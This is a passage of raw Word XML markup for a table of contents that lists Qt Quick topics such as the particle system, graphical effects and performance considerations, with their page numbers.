          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605262 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>117</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605263" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the Qt Quick Particle System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605263 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>117</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64" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The ParticleSystem</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605264 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>117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65" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Logical Particles</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605265 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>118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66" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Particle Groups</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605266 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>118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67" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Emitters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605267 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>118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68" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605268 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>119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69" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Affectors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605269 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>119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70" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Stochastic Parameters</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605270 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>119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71" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Directions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605271 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>119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72" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Shapes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605272 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>120</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605273" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Graphical Effects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605273 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>120</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74" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Blend</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605274 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>120</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75" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Color</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605275 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>120</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76" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Gradient</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605276 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>121</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77" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Distortion</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605277 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>121</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78" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Drop Shadow</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605278 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>121</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79" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Blur</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605279 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>121</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80" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Motion Blur</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605280 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>121</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81" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Glow</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605281 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>122</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82" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Mask</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605282 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>122</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605283" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Performance Considerations And Suggestions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605283 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>122</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84" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Timing Considerations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605284 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>122</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85" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Profiling</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605285 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>123</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86" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Code</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605286 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>123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87" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
